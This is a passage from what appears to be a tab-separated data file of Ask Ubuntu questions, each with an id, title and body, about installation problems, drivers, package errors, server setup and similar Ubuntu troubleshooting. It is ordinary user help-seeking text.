/usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu/libsdl2_image.so : riferimento non definito a `` sdl_snprintf '' collect2 : error : ld returned 1 exit status what am i doing wrong ? ?
334397	paraben 's iphone recovery stick and phone recovery stick on ubuntu	will utilizing either wine of crossover allow an individual to use paraben 's iphone recovery stick and/or phone recovery stick on ubuntu ? either one of paraben 's products only work on windows xp , windows 7 , or windows 8 .
334398	13.04 upgrade error	twice i tried to upgrade my 12.10 to 13.04 , but both times i got the same error . how can i fix it ? failed to fetch http : //ph.archive.ubuntu.com/ubuntu/pool/universe/libt/libtorrent-rasterbar/libtorrent-rasterbar7_0.16.7-0ubuntu1_amd64.deb connection failed [ ip : 91.189.91.14 80 ] failed to fetch http : //ph.archive.ubuntu.com/ubuntu/pool/universe/libt/libtorrent-rasterbar/python-libtorrent_0.16.7-0ubuntu1_amd64.deb connection failed [ ip : 91.189.91.13 80 ] eta : changed the ubuntu server from philippines to main server based on comment but i still got an error . failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/libt/libtorrent-rasterbar/libtorrent-rasterbar7_0.16.7-0ubuntu1_amd64.deb connection failed [ ip : 91.189.92.201 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/libt/libtorrent-rasterbar/python-libtorrent_0.16.7-0ubuntu1_amd64.deb connection failed [ ip : 91.189.91.13 80 ]
334403	how to add dependency after submitting a proprietary app to usc ?	i submitted my app `` brightness controller '' under proprietary license and it has been published . it contains an executable .py file . but the app depends on python-wxgtk2.8 i wrote it in the comments field but probably the packagers have ignored it . is there any way i can add the dependency myself ? please note that i had not debianized the package . i just tarred the brightness.py file and submitted it . can i just make a .deb with the dependency file and submit it ? the app is originally open-source , but i submitted it under proprietary so that i wo n't have to package it .
334407	plantronics voyager legend bt dongle recognized - but no sound ?	i think there are similar questions around , but not exactly the same problem : i just bought a plantronics voyager legend uc . like all `` uc '' models , the headset comes with a small bluetooth dongle . when plugging the dongle , it immediately pairs with the headset , all fine . when turning to the `` audio devices '' a new device shows up : plantronics bt 300 . using the pulseaudio volume control i can setup different profiles , like `` analog mono output '' , or `` analog mono duplex '' . but unfortunately no sound is reaching the headset . running ubuntu 12.10 64 bit . any idea anybody ?
334408	suspected security breach	for a few days now , i 'm seeing automated .log files and folders on my home folder , they are recreated even after they are deleted , could n't make sure the source of it ... file -- > libpeerconnection.log folder -- > t-random-on-star folder -- > ww.example.com is it a security breach or just bugs , how to be sure about this , how to check , how to learn more to secure and about security ... any help is appreciated , thanks in advance ... here is the image of it.. http : //www.anony.ws/kimr
334421	sudo apt-get install webhttrack and or sudo apt-get upgrade do n't work	sudo apt-get install webhttrack [ sudo ] password for apie : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : bzr-dbus gir1.2-gconf-2.0 kde-l10n-engb libjs-modernizr libp11-kit-gnome-keyring : i386 libpython-dev p7zip python-bzrlib python-gpgme python-keyring python-launchpadlib python-lazr.restfulclient python-lazr.uri python-oauth python-simplejson python-wadllib thunderbird-locale-en thunderbird-locale-en-gb thunderbird-locale-en-us ttf-droid ttf-liberation ttf-umefont wine-gecko1.4 wine-gecko1.4 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libhttrack2 webhttrack-common suggested packages : httrack httrack-doc the following new packages will be installed : libhttrack2 webhttrack webhttrack-common 0 upgraded , 3 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . need to get 814 kb of archives . after this operation , 2â 451 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //archive.ubuntu.com/ubuntu/ raring/universe libhttrack2 amd64 3.46.1-1 [ 392 kb ] get:2 http : //archive.ubuntu.com/ubuntu/ raring/universe webhttrack-common all 3.46.1-1 [ 381 kb ] get:3 only 2 links allowed : //archive.ubuntu.com/ubuntu/ raring/universe webhttrack amd64 3.46.1-1 [ 41,0 kb ] fetched 814 kb in 14s ( 55,4 kb/s ) selecting previously unselected package libhttrack2 . ( reading database ... 366723 files and directories currently installed . ) unpacking libhttrack2 ( from ... /libhttrack2_3.46.1-1_amd64.deb ) ... selecting previously unselected package webhttrack-common . unpacking webhttrack-common ( from ... /webhttrack-common_3.46.1-1_all.deb ) ... selecting previously unselected package webhttrack . unpacking webhttrack ( from ... /webhttrack_3.46.1-1_amd64.deb ) ... processing triggers for man-db ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... setting up linux-image-extra-3.8.0-29-generic ( 3.8.0-29.42 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.8.0-29-generic /boot/vmlinuz-3.8.0-29-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.8.0-29-generic /boot/vmlinuz-3.8.0-29-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.8.0-29-generic /boot/vmlinuz-3.8.0-29-generic update-initramfs : generating /boot/initrd.img-3.8.0-29-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.8.0-29-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-extra-3.8.0-29-generic.postinst line 1010. dpkg : error processing linux-image-extra-3.8.0-29-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-extra-3.8.0-29-generic ; however : package linux-image-extra-3.8.0-29-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.8.0.29.47 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured setting up libhttrack2 ( 3.46.1-1 ) ... no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . setting up webhttrack-common ( 3.46.1-1 ) ... setting up webhttrack ( 3.46.1-1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : linux-image-extra-3.8.0-29-generic linux-image-generic linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and or sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up linux-image-extra-3.8.0-29-generic ( 3.8.0-29.42 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.8.0-29-generic /boot/vmlinuz-3.8.0-29-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.8.0-29-generic /boot/vmlinuz-3.8.0-29-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.8.0-29-generic /boot/vmlinuz-3.8.0-29-generic update-initramfs : generating /boot/initrd.img-3.8.0-29-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.8.0-29-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-extra-3.8.0-29-generic.postinst line 1010. dpkg : error processing linux-image-extra-3.8.0-29-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-extra-3.8.0-29-generic ; however : package linux-image-extra-3.8.0-29-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.8.0.29.47 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-image-extra-3.8.0-29-generic linux-image-generic linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 )
334422	mounted cifs share but no write permissions	have reinstalled ubuntu on my web dev server . on the old one i had an smbfs share setup to access a share over the local network to other ubuntu boxes . it was setup using the following and worked fine - http : //ubuntuforums.org/showthread.php ? t=288534 this time round i am using cifs-utils instead of smbfs , but i presume this is fine ? upon reinstalling the server i have been having issues making the files writable . its mounted ok , and when from my local machine i ls -l it shows me write permissions ( although from my local user ) , but when i goto create or save over a file it gives me a no permissions error here is the line in my /etc/fstab . i had to make one change to be able to mount , and i added the , sec=ntlmv2 option , without which i was getting mount error ( 13 ) //192.168.0.40/webserver /media/webserver cifs credentials=/root/.smbcredentials , sec=ntlmv2 , iocharset=utf8 , file_mode=0777 , dir_mode=0777 , uid=1000 , gid=1000 0 0 and my credentials file ( unchanged from when it was previously working ) username=melon password=xxxxxxxxxxxx how can i fix it so that i have write permissions on my mount ?
334423	install jre 1.6 on 1.5 jdk	i have oracle jdk and jre 1.5 installed ubuntu lts . i want to keep jdk 1.5 and install oracle jre as 1.6. please let me know the steps or any clear source where i can get this done
334425	problems using mysql	i just opened mysql by typing `` mysql '' in the terminal . then , i went to create a database which threw this error : - mysql > create database test2 ; error 1044 ( 42000 ) : access denied for user '' @ 'localhost ' to database 'test2' mysql > how do i fix this ? p.s - i 've installed lamp using tasksel . thanks .
334428	ubuntu 12.04 `` connecting '' for 30 seconds , then gives up and says i 'm disconnected	i 'm completely new to linux , have a gateway lt40 netbook running ubuntu 12.04 . i ca n't get it to connect to the internet at all , wired or wireless . it says `` connecting , connecting ... '' for 30 seconds then says i 'm disconnected . any ideas on what could be going on and how to fix it ?
334432	what is the default password of user and guest in ubuntu 12.04	i am working on ubuntu 12.04 by using vmware . while working in that , suddenly vmware get hanged and ubuntu restarted . and asking for log in as user and guest session . i tried as `` password '' as password for user , but it did n't work . i ca n't enter in without password . so , can anybody help me out .
334436	unable to locate ntpd package	i am trying to install ntp for my server . however , on running sudo apt-get install ntpd i get the response unable to locate package ntpd . i have run sudo apt-get update and the problem still remains
334443	is apparmor shutting down rsyslogd / syslog ?	protocol of syslog is ending ( shut-down ? ) with output : pluto cracklib : no dictionary update necessary . aug 19 11:17:23 pluto kernel : [ 8090.193574 ] audit_printk_skb : 57 callbacks suppressed aug 19 11:17:23 pluto kernel : [ 8090.193576 ] type=1400 audit ( 1376903843.989:36 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=26536 comm= '' apparmor_parser '' aug 19 11:17:24 pluto kernel : [ 8090.193899 ] type=1400 audit ( 1376903843.993:37 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/cupsd '' pid=26536 comm= '' apparmor_parser '' aug 19 11:17:24 pluto kernel : [ 8090.882368 ] fw reject ( input ) : in=eth0 out= mac=ff : ff : ff : ff : ff : ff:00:23:5e:6f : ab : d9:08:00 src=10.158.0.1 dst=255.255.255.255 len=328 tos=0x00 prec=0x00 ttl=255 id=43484 proto=udp spt=67 dpt=68 len=308 aug 19 11:17:26 pluto kernel : [ 8093.100463 ] fw reject ( input ) : in=eth0 out= mac=ff : ff : ff : ff : ff : ff:00:23:5e:6f : ab : d9:08:00 src=10.158.0.1 dst=255.255.255.255 len=328 tos=0x00 prec=0x00 ttl=255 id=43579 proto=udp spt=67 dpt=68 len=308 aug 19 11:17:28 pluto dhclient : dhcprequest of 78.94.198.169 on eth0 to 10.158.0.1 port 67 is apparmor shutting-down rsyslogd somehow - and why ? !
334446	php and mysql programming not working	i 'm having a weird problem . i wrote a 2 line php ( mysql connect ) and some html..but..when i run the page..it just shows a blank page . here 's the code : - < ? php $ db = mysql_connect ( '127.0.1.1 ' , 'root ' , 'akshay123 ' ) or die ( mysql_error ( $ db ) ) ; mysql_select_db ( 'web_sitel ' ) or die ( mysql_error ( $ db ) ) ; ? > < html > < head > < title > register < /title > < /head > < form action= '' signup.php '' method= '' post '' > < table > < tr > < td > < input type= '' text '' name= '' noc '' value= '' name on card '' / > < /td > < /tr > < /table > < /form > < /html > i 've installed lamp using tasksel . i also installed php5-mysql..but..still nothing worked . any suggestions on this ?
334449	need php5.3 , lamp server is php 5.4.9	so i installed ubuntu and installed lamp-server however this gave me php 5.4.9 and i want 5.3.25 to mirror a production server . i managed to use the dotdeb repos and get 5.3 installed , however its still telling me i am on 5.4.9 . i suspect this is because i installed via lamp-server , and when i do a sudo dpkg -l | grep php its still showing php5-cli , and other packages as 5.4.9 i used lamp-server as i just wanted a quick and easy way to setup the server . i have installed it as various components many years ago and do n't really want to go through that again if possible . question : is there some way to just install lamp-server with an older version of php ? 5.3.25 would be ideal , but 5.3.27 seems to be whats on the dotdeb repo .
334454	how to open a downloaded file with a running instance	i want to open a file that i download ( using firefox ) with a running instance , instead of it opening it a new instance . for example : if i have gedit open and i download a textfile how can i make sure the textfile will be opened ( automatically ) by this running gedit instance ? i have found this : how to avoid opening a second instance ? but it is still unclear for me how and mainly where to apply this . note : i am not specifically interested in opening files with gedit , but more in the general problem .
334456	can not change resolution on ubuntu 13.04 desktop with vmware tools	i installed a new linux guest in my vmware vsphere 5.1 enviroment . this guest is a ubuntu 13.04 desktop . ater the installation of vmware tools i wanted to change the resolution because now it is 800x600 . i can not change the resolution cause then the system hangs . except changing it to 1024x768 it works . if i change it to a higher resolution it also hangs if i apply the resolution . vmware tools should normally manage the resolution.. what is wrong here ? the display is displayed as `` unknown '' under the display menu in ubuntu . kr ,
334459	what alternatives are there to nvidia and ati graphics cards ?	most long term linux os users will be all too familiar with the pain of using either of the two main makes of cards . for years i 've had to put up with drivers crashing , features seemingly being enabled and disabled at the whim of the propriety driver vendors and turning your computer back on after an update to find your os is as good as bricked . now i have a new laptop with a dual nvidia / intel graphics chipset . enabling the nvidia 3d support is a real pain , but i 'm not fussed . the intel graphics chipset is amazing ! ! a real breath of fresh air ! 2d is fast and smooth an i 've never had a glitch . it puts my âł390 graphics card to shame . so . i want to shake off ati and nvidia altogether . my faith has been slowly drained out of body . so back to my question . what cards are available ( preferably intel chipsets ) for my desktop machine ? i ca n't find any . i need dual dvi support at the least .
334461	i am running 32 bit widows 7 , which version of ubuntu do i need to install , 32 or 64 bit ?	i am currently running 32 bit widows 7 on a acer aspire d270 netbook ( atom cpu , 1gb ram ) , which version of ubuntu do i need to install , 12,04 32 or 64 bit version ? please help and be gentle with me , i am very new to all this tech stuff and easily scared ! : )
334462	my wireless datacard is not able to connect in ubuntu 13.04	i have reliance cdma data card . i installed ubuntu 13.04 newly . at first the net is able to connect automatically . but it is not able to connect showing error . some thing like this : ( 1 ) creating object for path'/org/freedesktop/networkmanager/activeconnection/24'failed in libnm-glib
334464	windows 8 does n't boot after installing ubuntu 12.04	after installing ubuntu 12.04 i used ubuntu boot repair ( as usual ) to reinstall the grub and visualize the other os installed ( ie . windows 8 ) . unfortunately , this time something did n't work at all , and i am now not able to boot into windows 8 , which soon after selection in the grub starts and fails the automatic repair . even os repristinating does n't seem to work . i think i have installed the ubuntu 12.04 boot loader in the same partition of the win8 boot loader ( sda2 , efi ) , so , as a results , ubuntu boots perfectly , while win8 does n't . is there a way to rescue windows 8 without reinstalling it ? step by step advice will be welcomed ! xd
334471	unity tweak tool installation problems	whenever i am trying to install unity tweak tool through command line , this message shows up e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? how to rectify this ?
334475	how do i open a file that leads into the terminal ?	let 's say put a file on the desktop , and when it opens , it opens in the terminal . if i want to do this , what extension can i use in `` save as '' of the text editor ? ( e.g . open.shell ) ubuntu 12.04.2 64-bit
334478	how to add permission to write to /var/www for my ftp client	i 'm trying to install tapatalk plugin on my phpbb3 forum write method for automod is ftp and connection is successful . i think the ftp client might not have write permission to /var/www . how can i fix that ? i 'm using ubuntu server 12.04 with vsftpd . drwxr-xr-x 3 root root 4096 aug 19 02:07 www thanks !
334481	'ubuntu server certified hardware ' vs building my own physical server ?	i 'm going to need a few new physical servers running ubuntu server ( 12.04 lts then upgrading next year to 14.04 lts ) , and i 'm wondering what is the difference between choosing a server from the 'ubuntu server certified hardware ' list ( http : //www.ubuntu.com/certification/server/ ) vs building my own ? i understand the need for hardware certification for laptops or desktops , where things like hibernate/suspend , wifi , video card , etc are important . but what 's the need for server certification ? and what risks are there ( in terms of compatibility with ubuntu server ) with building my own physical server vs choosing an ubuntu-certified server ? ( i understand that when building my own servers i wo n't have a warranty , but that 's fine because the servers are not for mission-critical use . i can handle downtime in order to replace any failed components . )
334491	startup applications refuses to launch a simple , executable script	screenshots of some relevant information : i want to run a bash script at login , so i put it in startup applications . there is no configuration besides calling `` xterm -e autovpn '' that works . here 's the thing : it worked just fine on 32-bit ubuntu 13.04 . i upgraded with a fresh install 3 days ago , and now i 'm manually calling a script that used to autorun like a champ . i 've been working this issue for hours over the course of several days . google tells me nothing . here 's a copy of what 's in .config/autostart : [ desktop entry ] type=application exec=autovpn hidden=false nodisplay=false x-gnome-autostart-enabled=true name [ en_us ] =autovpn name=autovpn comment [ en_us ] =connect automatically to vpn . comment=connect automatically to vpn . thanks for any help ! !
334499	terminal of ubuntu 12.04	i am new to ubuntu and i want to learn to use console or terminal of ubuntu what it can do , uses , and using ubuntu ?
334500	ubuntu can be used as hard real time os ?	i want os for beagleboard which can support hard real time os feature . is ubuntu hard real time os ?
334504	will ubuntu be fully supported for macbook air 2013 haswell	i am thinking of getting a macbook air 2013 with the new haswell chip and broadcom chip . i am not in a rush to install ubuntu so i can wait . just curious if ubuntu will be fully suported for this piece of hardware and run smoothly like normal laptops do ? simply said , just install and play , no big technical tweaks to be made to work . currently , the most cheapest haswell laptops is this , so i am considering . thanks .
334509	time zone is kolkatta , india	on my system , the time zone is set to kolkatta , india , but it is not showing the correct time on the clock , it 's 5:30 hour behind actual time . in system settings if default system country is us , even after kolkatta , india has been selected , the time remains behind by 5:30 hour . can anyone suggest what i should do ?
334511	amd graphics card : what drivers should i install	i have just downloaded ubuntu and i am trying to play some steam games but steam says that i should update my drivers . i am using the post release driver , but should i also install the experimental and xorg and kernel module drivers ?
334512	recover data from external 1tb hdd	i 'm currently running ubuntu 13.04 and my external hard drive no longer seems to mount . i 've tried plugging it into a windows os laptop and it comes up with a corruption error when trying to access the disk . on ubuntu i can only view the disk using gparted but again can not access any data etc . what is the best method for trying to recover this data ? most of it i have backed up but there are some folders which are n't , so ideally i would like to be able to recover the data .
334515	is it possible to deploy a juju service to multiple specific machines ?	i am trying to deploy ha ceph like shown in openstackha but i wanted to deploy ceph mon and ceph osd on same 3 machines . so in order to that , my 1st cmd will be , juju deploy -- config local.yaml -n 3 local : ceph and 2nd cmd , i am wondering how i should do , coz i want to deploy ceph-osd to same machines . something like this , juju deploy -- force-machine 0 -- config ceph.yaml local : ceph-osd juju deploy -- force-machine 1 -- config ceph.yaml local : ceph-osd juju deploy -- force-machine 2 -- config ceph.yaml local : ceph-osd or can it be like this , juju deploy -- force-machine 0,1,2 -- config ceph.yaml -n 3 local : ceph-osd i have not tried these command actually and not good aware of cmd syntax also , thats why i am asking it here
334520	13.04 mouse pointer shadow	all of a sudden , my mouse pointer had a shadow , and is very difficult to use . it is there with any mouse , whether usb or my dell bluetooth mouse . can someone suggest a way to get it back to the default as i ca n't think of anything that would have changed ? here is a picture shot from my cell phone of it :
334525	how to cancel installation of matlab while applying changes ?	out of curiosity to try matlab i mistakenly installed the matlab from the ubuntu software center . i did not realize that it was just an upgrade for the installed program . now it wants the directory where the matlab is installed . as i do not have matlab installed now i ca n't give the directory . so , now i want to remove it from the progress tab but there is no x ( i.e. , cancel ) button , and as it was not completed i ca n't shop for any further software from ubuntu software center . what can i do ?
334529	pxe booting ubuntu into a ramdisk	i currently have a small pxe server running and it works fine . the only issue is that the clients seem to be running their os from the server itself . eventually this will become a server supporting about 50 clients . i need to keep as much network traffic off the network as possible . how can i build the image so that the clients run everything from their own ram disk rather than the nfs server ? thanks .
334536	ensuring cloned computer can coexist with original on network	i 've just cloned a computer ( see here for my process , if it 's relevant ) and i want to make sure it will be ok on the same network as the original . i 've changed the host name back to what it was pre cloning , so there wo n't be duplicates on the network , but i want to make sure i make any other necessary fixes before i put the computers running ubuntu 12.04 , on the same network . is there anything else i need to do before i link them back up ?
334537	video capture problems	i 'm trying to connect a camcorder to the pc using diamond vc 500 ( which shows up in windows as otg 102 and that driver is supported by v4l ) . i have several questions as many things i 've tried have not worked . first of all , i downloaded the v4l package and now ubuntu is recognizing the vc500 usb video capture device . i tried to connect to vlc to see the video i 'm playing on a hi8 camcorder , and vlc will show a brief flicker of the video playing on the camcorder , then freezes . no color , only shades of blue in the image . i tried gtk+ uvc viewer to see if that would work , but every time i try to open it , the wheel spins like the computer is thinking , but the uvc viewer never opens . finally , i tried to use cinelerra , but i go to record and nothing happens . i tried to use the preference to change the input to vidoe 4 linux 1 and 2 , but neither works and the drop down menu option for soucre in the record window is always empty . i 've read that people have had problems using the diamond vc5oo on ubuntu , so maybe i need a new usb video capture device . if that 's the case , anyone know of a good one ? any help would be appreciated !
334538	dpkg : warning : 'tar ' not found in path or not executable	i have installed my programs by `` synaptic '' previously , but now it shows errors and does n't install any programs , for example , i want to install xserver-xorg-dev but synaptic shows below errors : dpkg : warning : 'tar ' not found in path or not executable . dpkg : error : 1 expected program not found in path or not executable . note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin . e : sub-process /usr/bin/dpkg returned an error code ( 2 ) a package failed to install . trying to recover : dpkg : warning : 'tar ' not found in path or not executable . dpkg : error : 1 expected program not found in path or not executable . note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin .
334539	fedora spins work on ubuntu or not ?	i want to run the fedora spins , but on ubuntu . ubuntu is way much lighter than the fedora versions , but it is their spin that i am interested in . is any spin like thing is available on ubuntu ? if not then are fedora spins capable of running on ubuntu ?
334540	pressing < down > opens a new tab in konsole	since only recently , when i press the â ( the down ) key , a new tab is opened in the konsole terminal emulator . this is only happens in konsole , not , for example , in gnome terminal . i do n't know what changed to make it happen . how can i fix this ?
334543	i ca n't upgrade ubuntu 10.10	i received my copy from a friend , and when i try to upgrade , it keeps saying there is a problem with my internet connection , but i can access everything online . also i can not install anything so please help thank you . i do n't know much about ubuntu , i just like how stable it is .
334544	how to uppercase first letter of the first word in each sentence using shell script ?	i am trying to capitalize each first letter of the first word in each sentence from a txt file called input.txt and i want this input file to be a argument of the shell script ./script.sh input.txt sample input file : i am andrew . you are jhon . here we are , forever . result file : i am andrew . you are jhon . here we are , forever . a special case . what if our text is ( related to @ raduradeanu answer ) i am andrew . you are jhon . here we are forever the result would be : i am andrew . you are jhon . here we are forever . so it convert to uppercase each first word of each sentence and also each first word of new line . how do we skip over uppercase first word of new line ? so the correct result must be : i am andrew . you are jhon . here we are forever . what if the sentence closes in `` ? '' or `` ! '' ? ? ?
334548	after installing nvidia the resolution changed to 640x480	i visited the nvidia website downloaded the nvidia nvidia-linux-x86_64-304.108.run drivers . i stopped my x server and terminated all opengl applications . i changed my run level to 3 so that it boot to vga console and installed it . i successfully installed the driver , but after installing my resolution has changed to 640x480 and now i am stuck , and i ca n't access my sidebar . i am a new user so i 'll request a clear answer .
334550	i am finding it impossible to install ubuntu 13.04 stuck on splash screen	ubuntu 13.10 ( 19 august 2913 daily build ) works ! i would prefer not using a in development version but it 's ok , even if it 's too instable in two months is going to be released . even wifi works out of the box ! anyway if someone knows a solution it would be better , so please post it if you have an answer . i 'm trying to install ubuntu 13.04 on my new notebook , a toshiba c855-233 , initially i could n't get further than the grub menu , now i have made a little step forward . adding 'nomodeset ' to the boot option , i get to the ubuntu splash screen , which seems to load ( the dots are animated ) , but then the animation stops and i 'm stuck on the splash screen . the graphic card is an amd radeon hd 7610m . edit : removing `` quiet splash '' from grub options ( and keeping nomodeset ) i get to this screen where it once again get stuck : sorry for the low quality but opening it at full resolution it is readable . the [ fail ] is about `` restore sound card ( s ) mixer state ( s ) '' update plugging a vga monitor into the notobook this is what i get : this time it works only without `` nomodeset '' , i 'm able to move the mouse but anything else does n't seem to work edit 2 i accessed a virtual terminal from the vga screen ( it does n't work in the notebook 's one ) and here is xorg log https : //www.dropbox.com/s/r314cmcwim9pwdo/0.txt
334555	is there anyway to change themes using a program ?	this also means that the program can install themes by itself , because the main reason i do n't want to change from the default theme is that i have to install the theme myself after downloading it edit : i want to be able to install theme using any theme manager ( if there are any ) , but i do n't want something where i 'd have to install the theme myself and the theme manager would only change the thme
334559	how can i setup hotkeys for tiling individual windows in unity ( ubuntu 12.04 ) ?	i like using combinations of super + < key > to tile individual windows . this works in windows 7+ by default , and in mac os x with shiftit.app . how can i do this in ubuntu precise 12.04 ?
334561	problems with broadcom bcm4311 wireless card on hp pavillion dv6000	i hope someone can help out with this ( i 've tried all possible solutions proposed for similar problems , but non has solved the problem so far ) . i installed ubuntu 13.04 ( for the first time in my life ) ; everything looks ok , except for the wireless connection that wo n't work . the laptop i 'm using is a dv6000 from hp ; the wireless card is a broadcom bcm4311 - which apparently is prone to causing problems ...
334564	unable to install emacs24 on ubuntu 12.04 precise	i 've added the cassou ppa , but when i try to install emacs24 or emacs-snapshot , apt-get ca n't seem to find the right packages : $ sudo add-apt-repository ppa : cassou/emacs ... $ sudo apt-get update ... $ sudo apt-get install emacs24 emacs24-el emacs24-common-non-dfsg reading package lists ... done building dependency tree reading state information ... done e : unable to locate package emacs24 e : unable to locate package emacs24-el e : unable to locate package emacs24-common-non-dfsg $ sudo apt-get install emacs-snapshot reading package lists ... done building dependency tree reading state information ... done package emacs-snapshot is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'emacs-snapshot ' has no installation candidate
334567	no network devices available after fresh install of 12.04	i have completed a fresh installed of ubuntu 12.04 , but my intel 82578dc is not being detected . please can anyone help me to install the network driver .
334570	how to open nautilus ( file manager ) preferences ?	please could you tell me where can i find the file manager preferences in ubuntu 13.04 . i want to run a sh file .
334572	i am having command line problems in 13.04	i 'm using ubuntu 13.04 and trying to enter this command sudo add-apt-repository ppa : cairo-dock-team/ppa , but then it asks for my password and i ca n't type anything . the only thing i can do is press enter , and then it says incorrect password . please help !
334576	web page security	how can i prevent a user from seeing the port id information within a page . what is the easiest way within ubuntu lamp ( apache2 ) to not display sensitive port info with a `` view source '' browser option or a mouse-over trigger ? if my server is class.edu and i choose to use port forward hyperlinks within a web page , what is the proper way to create the web page within /var/www ? which .conf files on the server should i consider going into to input my port forward information ? someone mentioned aliases in my class .
334580	how do i make a read-only file system writable for pendrive	when i am trying to format my pendrive , i 'm getting the following error . root @ obbu-g41m-combo : /home/obbu # mkfs.vfat -n 'ubuntu ' -i /dev/sdb1 mkfs.vfat 3.0.14 ( 23 jan 2023 ) mkfs.vfat : unable to open /dev/sdb1 : read-only file system
334581	where did all display resolutions go ?	i just installed ubuntu 12.04 on my new laptop . after testing some things with the livecd . when i ran ubuntu with the livecd i could choose between a number of different resolutions for my display , but after installing ubuntu on my hard drive there 's only one option left ( highest available res ) . how do i get all the different resolution options back like they were presented on the livecd ? edit : i just reinstalled the whole os for a different reason , and it seems the non-proprietary graphics driver can handle different resolutions . the proprietary nvidia drivers ( both 304 and 319 ) can only use the full resolution at 2880x1620 . edit2 : i still got no answer to why the nvidia-drivers do n't support lower resolutions , but i found a workaround . by running xrandr -- output dp-0 -- scale 0.75x0.75 i can scale everything down by 25 % . this makes ubuntu usable again , even tough i loose some of the `` crispness '' . that would be expected by running at a lower resolution anyway .
334588	13.04 software updater blank	software updater says i have 7 updates , but both the 'details ' and 'technical description ' areas are blank ! i do n't want to install unknowns . ubuntu studio 13.4 . what should i do ?
334596	run cronjob every night between 3-6 o clock but only once	i want to run a cronjob daily at a specific time range but only once in that period . how is that possible ? i see a possibility in anacrhon but do n't know how to set up such scenario .
334598	ubuntu server 13.04 and xrpd	im having problems with the 13.04 with xrpd because when a resume the remote desktop the programs are not there any more but the prosess are still running . but in 12.10 and 12.04 works great . i try and search for any solutions but i did n't find it . pd : im tryin using lubuntu desktop .
334604	is there a way to access my current windows installation within a vm environment ?	i currently dual boot windows 7 and ubuntu 13.04 . i would like to be able to use ubuntu as my only os but unfortunately there are programs for my job that only play with windows . i know that virtual box will allow me to run ubuntu and have windows opened in a window as vmware . unfortunately , it looks like i would be installing windows from scratch within the vm . is there a way to access my current windows installation within the vm environment ?
334608	ubuntu license for companies	i 'm really concerned because a need to know if ubuntu is totally free for a company . i mean , if i use a private software , i have to pay that license package , but have i to pay for use ubuntu ? have i to get a license ? many thanks , regards .
